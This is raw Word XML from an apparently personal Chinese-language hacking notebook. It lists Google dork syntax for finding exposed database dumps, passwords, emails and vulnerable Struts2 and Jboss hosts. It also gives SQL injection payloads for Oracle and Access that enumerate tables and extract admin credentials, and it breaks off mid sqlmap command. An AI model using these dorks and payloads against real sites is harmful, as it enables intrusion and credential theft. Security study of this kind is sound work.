        <w:t xml:space="preserve">intitle: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这样网页标题中带有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的网页都会被搜索出来。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>inurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>：搜索包含有特定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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>inurl:mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>，则可以找到带有</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>intext:</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索网页正文内容中的指定字符，例如输入“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>intext:mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这个</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似我们平时在某些网站中使用的“文章内容搜索”功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>filetype:</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索指定类型的文件。例如输入“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>filetype:mst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003439C6">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将返回所有以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结尾的文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>：找到与指定网站有联系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r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Site:mst.hi-ourlife.com”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>。所有和这个网站有</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联系的</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都会被显示。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003630CF" w:rsidRDefault="003630CF" w:rsidP="003439C6"/>
    <w:p w:rsidR="003630CF" w:rsidRDefault="003630CF" w:rsidP="003439C6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新思路（先filetype</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集一下敏感信息：.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="003439C6"/>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="003439C6"/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目录列表的敏感文件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lastRenderedPageBreak/>
        <w:t>1.(site:域名）intitle:"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A42238">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>index.of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A42238">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"(|intitle:...) (intext:)"敏感文件名/敏感后缀名" (|intext:...)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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A42238">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A42238">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中能访问的敏感文件或者目录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1.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"敏感文件名/目录名"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2.(site:域名) filetype:后缀名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文件名(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)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3.(site:域名) intext:"文件中独一无二的短语"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特定的服务器版本的网站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text:"Apache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/1.3.27 Server at" (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>数据库的转储</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>(site:域名) # Dumping data for table(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user|username|password|pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>查找子域名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>site:"主机名" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>site:"</w:t>
      </w:r>
      <w:hyperlink r:id="rId69" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>.主机名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>查找网站中泄露出的邮箱地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">site:域名 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intext:"email</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"(|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>intext:...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>更多组合 我们可以把自己的搜索与能获取更好的结果的搜索</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>项一起</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>1.当查找email时，能添加类似 通讯录 邮件 电子邮件 发送这种关键词</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>2.查找电话号码的时候可以使用一些类似 电话 移动电话 通讯录 数字 手机</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>查找网站中的人的信息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>site:域名 intext:"人的信息"(|intext:...) (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>用户名相关</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>(site:域名) intext:"username"|intext:"userid"|intext:"employee.ID"(|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>intext:...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) "your username is" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>密码相关</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(site:域名) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intext:"password"|intext:"passcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"(|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>intext:...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) "your password is" "reminder forgotten" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>公司相关</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(site:域名) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intext:"admin"|intext:"administrator"|intext:"contact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>system"|intext:"contact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> your administrator" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRPr="00A42238" w:rsidRDefault="0048048C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Style w:val="aa"/>
        </w:rPr>
        <w:t>filetype:mdb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inurl:com</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A42238" w:rsidRPr="003439C6" w:rsidRDefault="00A42238" w:rsidP="003439C6"/>
    <w:p w:rsidR="00CA2DA4" w:rsidRPr="003630CF" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w:rsid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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>pache下的strust2框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">： </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一般存在漏洞的特征：文件类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.action</w:t>
      </w:r>
      <w:proofErr w:type="gram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do</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spell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html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA2DA4" w:rsidRP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J</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ava反序列化漏洞的java应用程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA2DA4" w:rsidRP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CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>boss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p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logic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p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Share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00CA2DA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boss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>漏洞寻找语句：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inurl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：/web/guest/home/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C3D8B" w:rsidRDefault="003C3D8B" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C3D8B" w:rsidRDefault="003C3D8B" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D8B">
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A449A" w:rsidRPr="000A449A" w:rsidRDefault="000A449A" w:rsidP="000A449A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A449A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>//，-- , /**/, #, --+, -- -, ;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000A449A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A449A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>00,--a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034210A" w:rsidRDefault="006F7A6B" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>“/*”是MySQL中的注释符，返回错误说明该注入点不是MySQL；</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>“--”是Oracle和MSSQL支持的注释符，如果返回正常，则说明为这两种数据库类型之一</w:t>
      </w:r>
      <w:r w:rsidR="0034210A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B110F74" wp14:editId="051D8B4F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>589915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="2242185"/>
            <wp:effectExtent l="0" t="0" r="254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D8B" w:rsidRPr="001011AF" w:rsidRDefault="001011AF" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="001011AF">
        <w:t>Oracle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order by 3--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proofErr w:type="gram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gramEnd"/>
      <w:r w:rsidRPr="003C3D8B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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'null',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  //返回正常，则第一个字段是数字型，返回错误，为字符型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1,'2','3' from dual--  //判断显示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banner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sys.v_$version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探测数据库版本信息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查询第一个表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STUDENT'),null from dual--  //第二个表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 //查看第一个字段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一个表名]'),null from dual-- //查看第二个字段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&lt;&gt;'[第一个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二个表名]'),null from dual--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B36FD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id,name,pas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student where id=1--  //查看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B36FD" w:rsidRDefault="009B36FD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36FD" w:rsidRDefault="009B36FD" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ccess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注入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注入点：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‘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，and 1=1, and1=2, or 1=1, or 1=2, and 1=23, 在id=后面加一个减号，报错有注入点</w:t>
      </w:r>
    </w:p>
    <w:p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数据库类型：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)&gt;0  存在说明是access数据库 ,  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 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)&gt;0 存在说明是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server数据库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的表：and exists(select * from admin) 返回成功说明存在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的数据库中的表：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admin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proofErr w:type="spellStart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name</w:t>
      </w:r>
      <w:r w:rsidRPr="009B36FD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，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表内的字段名：and exists(select username from admin) 返回成功说明存在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字段长度：order by N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报错：and 1=2 union select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1,2,...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.,N from admin(联合查询)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账户密码长度：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(admin) from admin)=5 如果返回正常说明管理账户的长度为5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(password) from admin)=5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猜解管理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密码长度是5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>注入Access数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="009B36FD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:color w:val="7C79E5"/>
        </w:rPr>
        <w:t>爆出access数据库存在的表</w:t>
      </w:r>
      <w:r>
        <w:t>，只能利用枚举的方式爆破。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B36FD" w:rsidRDefault="009B36FD" w:rsidP="009B36FD">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"xxx</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t xml:space="preserve">  --</w:t>
      </w:r>
